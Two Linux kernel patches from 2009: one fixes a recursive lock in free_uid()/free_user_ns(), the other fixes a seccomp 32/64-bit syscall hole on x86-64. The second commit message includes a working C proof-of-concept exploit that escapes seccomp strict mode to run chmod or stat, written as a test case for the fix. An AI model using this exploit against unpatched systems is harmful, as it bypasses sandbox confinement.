From 5170836679185357dc1b7660bad13287b39e1e33 Mon Sep 17 00:00:00 2001 From: David Howells Date: Fri, 27 Feb 2009 14:03:03 -0800 Subject: Fix recursive lock in free_uid()/free_user_ns() free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction. Fix this by deferring the destruction of the user_namespace. Signed-off-by: David Howells Acked-by: Serge Hallyn Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- kernel/user_namespace.c | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) (limited to 'kernel') diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c index 79084311ee57..076c7c8215b0 100644 --- a/kernel/user_namespace.c +++ b/kernel/user_namespace.c @@ -60,12 +60,25 @@ int create_user_ns(struct cred *new) return 0; } -void free_user_ns(struct kref *kref) +/* + * Deferred destructor for a user namespace. This is required because + * free_user_ns() may be called with uidhash_lock held, but we need to call + * back to free_uid() which will want to take the lock again. + */ +static void free_user_ns_work(struct work_struct *work) { - struct user_namespace *ns; - - ns = container_of(kref, struct user_namespace, kref); + struct user_namespace *ns = + container_of(work, struct user_namespace, destroyer); free_uid(ns->creator); kfree(ns); } + +void free_user_ns(struct kref *kref) +{ + struct user_namespace *ns = + container_of(kref, struct user_namespace, kref); + + INIT_WORK(&ns->destroyer, free_user_ns_work); + schedule_work(&ns->destroyer); +} EXPORT_SYMBOL(free_user_ns); -- cgit v1.2.1 From 5b1017404aea6d2e552e991b3fd814d839e9cd67 Mon Sep 17 00:00:00 2001 From: Roland McGrath Date: Fri, 27 Feb 2009 23:25:54 -0800 Subject: x86-64: seccomp: fix 32/64 syscall hole On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include #include #include #include #include #include #include int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds --- kernel/seccomp.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) (limited to 'kernel') diff --git a/kernel/seccomp.c b/kernel/seccomp.c index ad64fcb731f2..57d4b13b631d 100644 --- a/kernel/seccomp.c +++ b/kernel/seccomp.c @@ -8,6 +8,7 @@ #include #include +#include /* #define SECCOMP_DEBUG 1 */ #define NR_SECCOMP_MODES 1 @@ -22,7 +23,7 @@ static int mode1_syscalls[] = { 0, /* null terminated */ }; -#ifdef TIF_32BIT +#ifdef CONFIG_COMPAT static int mode1_syscalls_32[] = { __NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32, 0, /* null terminated */ @@ -37,8 +38,8 @@ void __secure_computing(int this_syscall) switch (mode) { case 1: syscall = mode1_syscalls; -#ifdef TIF_32BIT - if (test_thread_flag(TIF_32BIT)) +#ifdef CONFIG_COMPAT + if (is_compat_task()) syscall = mode1_syscalls_32; #endif do { -- cgit v1.2.1